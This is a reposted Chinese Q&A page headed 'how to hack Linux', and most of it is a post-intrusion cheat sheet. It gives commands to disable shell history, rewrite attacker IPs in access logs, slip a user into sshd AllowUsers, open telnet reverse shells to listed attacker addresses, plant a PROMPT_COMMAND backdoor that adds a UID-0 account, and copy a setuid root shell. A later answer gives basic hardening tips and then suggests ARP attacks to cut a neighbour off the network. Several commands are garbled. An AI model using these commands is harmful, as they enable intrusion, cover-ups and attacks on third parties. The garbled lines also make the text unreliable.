linux 怎么入侵??

linux 怎么入侵??,第1张

1,登录ssh之后不记录history

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOGexport HISTFILE=/dev/nullexport HISTSIZE=0export HISTFILESIZE=0

2. sed的一些邪恶用法

邪恶的替换到登录的IP和日志里的访问IP

sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security

邪恶的添加ssh限制登录的用户

sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config

不过这个添加之后要强制重启sshd服务才可以生效

lsof -i:22 查找sshd的进程ID

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sshd18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)

sshd31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)

然后

kill -SIGHUP 18662

3.通过webshell反dshell回来之后获取真正的ttyshell

python -c ‘import ptypty.spawn(“/bin/sh”)’

另外一种获取ttyshell的方法

$ cat sh.exp

#!/usr/bin/expect

# Spawn a shell, then allow the user to interact with it.

# The new shell will have a good enough TTY to run tools like ssh, su and login

spawn sh

interact

bash sh.exp

4.通过TELNET进行反向连接:

telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]

telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081

/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001

在203.93.28.236上面运行:

nc –l –p 8000

nc –l –p 8001

/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089

5.curl download

The full command should look something like this:

curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg

6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法

unalias ls

7.linux的BASH提权

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null &&echo kkoo:123456 /usr/sbin/chpasswd &>/dev/null &&unset PROMPT_COMMAND”

8.ssh tunnel

ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host

ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host

ssh -C -f -N -g -D listen_port user@Tunnel_Host-f

9.本地rootshell

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体 *** 作比较简单,大概说一下cp /bin/ksh . chown root.root kshchmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个 *** 作

由于linux系统本身的设计,你如果不知道对方的管理员权限密码,基本上除了他主动向你开放网络文件服务,你是无法获得对方对方系统内的任何文件的。所以如果你真的想要入侵他的电脑,尤其在你电脑水平不高的情况下,通过网络入侵成功的可能性,还不如你拿个U盘去他房间直接拷贝文件的成功可能性高(开个玩笑)。

所以,其实你最应该做的,不是入侵他的电脑,而是做好自己的安全保障工作,以免自己的文件再次被别人偷取。我有以下建议(既然你说熟悉windows,具体 *** 作我就不赘述了):

1.检查自己系统的病毒/木马,并清除(如果有)。因为很多被入侵的windows用户其实是因为自己运行了黑客软件的服务端,从而成为了黑客的肉鸡,在这种情况下,把在你系统中偷偷运行的黑客软件清除掉即可(用普通的杀毒软件即可,建议使用360)。〔重要!很多木马可以对外开放文件服务〕

2.关闭所有的网络服务以及文件共享服务(网上有海量的此类介绍,或者用优化大师等优化软件进行设置)[重要!通过你的共享,同个局域网下的用户可以获得你的文件的]。

3.下载并安装最新的系统安全补丁。

4.不要运行从网上下载的带有exe后缀的文件,或者解压后出现的exe文件(无论是谁发送给你的,即使是认识的人)。如果一定要运行,先主动对此文件查毒,再运行。

5.为系统管理员账户加上密码,同时任何用户都不要设置空密码,禁用guest账户。

================

最后,你如果真的想要小小的报复一下你的邻居,可以给你一个小小的建议:

你可以先获得他的局域网IP地址以及mac地址,然后去找可以进行ARP攻击的软件。ARP攻击可以让其无法上网,而且最重要的是。。。ARP攻击无视系统防御。。。。。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/7498213.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-06
下一篇 2023-04-06

发表评论

登录后才能评论

评论列表(0条)

保存